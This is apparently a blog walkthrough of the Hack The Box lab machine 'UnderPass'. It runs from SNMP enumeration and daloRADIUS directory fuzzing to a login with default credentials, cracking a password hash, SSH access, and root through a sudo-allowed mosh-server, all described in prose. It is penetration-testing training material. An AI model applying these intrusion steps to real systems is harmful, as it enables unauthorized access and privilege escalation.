It’s been a bit since I’ve posted any walkthroughs, so here we are back with an easy machine called UnderPass.
I use my own Kali VM to attack from and connect through VPN to the HTB network. You can do that or use one of their attack boxes. I prefer my own as I have a lot of notes, exploits, and other files saved on my personal Kali VM instance.
After booting up my Kali VM and connecting to VPN, we’ll boot up the UnderPass machine and start scanning.
As is standard, we’ll get an nmap scan fired off to see what network ports are open on the machine.
Our initial nmap scan shows a webservice on port 80 and ssh open on port 22.
We’ll add overpass.htb to our /etc/hosts/ file for easy name resolution.
Now, navigating to the website we can see there’s a default apache page.
Nothing to see there, so let’s do some directory fuzzing with ffuf.
None of these are accessible, giving me a forbidden message. So, let’s take a step back and do a different type of nmap scan. Our initial scan was using tcp, but maybe there’s something else we’re not seeing using UDP. We’ll use the -sU flag and limit it to the top 100 ports.
We can now see there’s an snmp port open as well as radius.
So, let’s enumerate the snmp service to see what we can find.
First, we’ll use snmp-check with the -c Public option.
Oof, it would work correctly if I used correct capitalization. Quick review of the Kali doc here shows that ‘public’ should be lowercase. Let’s try that again.
Not a ton of information but I do see a user, maybe we can use that later? I’ll keep that noted just in case. Additionally, the hostname output says that this is the only daloradius server in the basin. I have no idea what that means, but let’s do some Googling on it.
In the meanwhile, we’ll use snmpwalk to see if there’s anything additional that snmp-check missed.
I spent a bit of time doing some Google searching on Daloradius. I was able to find this article on installing Daloradius that shows the default web path to the service as well as what appears to be default credentials.
Trying to visit this directory results in a forbidden message. So, we know the endpoint appears to be there….somewhere…hiding. Let’s see if we can find it with ffuf. Using ffuf, I just fed it the option of underpass.htb/daloradius/FUZZ.
We will keep iterating and through these subfolders til we find what we’re looking for. So far we know there’s /daloradius/app/. Next, we find users and navigate to that on the browser.
It directs us to the users login endpoint. Let’s see if we can use the default credentials for this. I used the creds from the install guide above but that did not work.
Quick Google search gave me these creds. However, these still do not work.
Ok, when in doubt, enumerate out. Let’s do some more searching, this time with dirsearch.
We found that there’s another endpoint. This one called operators. Ffuf did not find this endpoint, likely due to the wordlist I used, which is a bit of a bummer. However, I’ve often found that using different tools & wordlists does seem to help if you get stuck.
Same login page but /operators/ endpoint instead of /users/. Let’s try those default credentials again.
We are in!
Here, I spent a little time browsing the site and taking note of anything interesting. In the config section there is a Database Settings menu that has a username and password for their MySQLi database. I’ll note that for future use, if needed.
Additionally, I noticed there is 1 user listed on the main page. Clicking on the user list shows us what appears to be a hashed password for that user.
We can take that hash and convert it to see what the password is.
Now that we have the password, let’s try using this account & password on the ssh service.
We now have user access to the box and the user flag is sitting in our current directory.
User flag has been captured. Now, let’s work on privilege escalation to get the root flag.
We’ll use our trusty linpeas script. Linpeas stands for linux privilege escalation awesome tool, if I remember correctly. It’s a super useful tool to scan the system and look for possible ways to gain root access. There is also a windows version called winpeas.
I will host the linpeas from a local folder on my attack machine via a python simple http server and then from the victim machine I will use curl to grab and run the script.
Above I’m running a simple http server and you can see the incoming GET request for linpeas.sh.
Here, you can see the curl request to my attack box for the linpeas script and then running it.
After a bit of running we can see the output of a simple ‘sudo -L’ command. svcMosh account can run /usr/bin/mosh-server with root privileges.
Do I know what mosh-server is? Nope! After a bit of Google searching on what mosh-server is and how to do privilege escalation with it, I found this Medium article super handy. By the way, did I mention how much time I spend Googling during these machines? There’s so many different tools, software, and exploits out there that Google becomes super useful.
Above, we run the mosh server and then following the article, we take the key and connect with the mosh client locally. This brings us directly in as a root user. Just as a side note, this took me SEVERAL tries to do. For some reason when I was copying the key after starting the mosh server it was not connecting. I’m not sure if it was how I was pasting or if I was accidentally copying a space. So, if it doesn’t work the first time, be very careful how you copy/paste.
Now that I have root, we can simply grab the root flag and finish this machine.
This was a pretty interesting one! I’ve not messed with mosh server before or the daloradius. So these are two new services to me that I had a blast exploiting. I hope you enjoyed the walkthrough and I’ll see you again on the next one!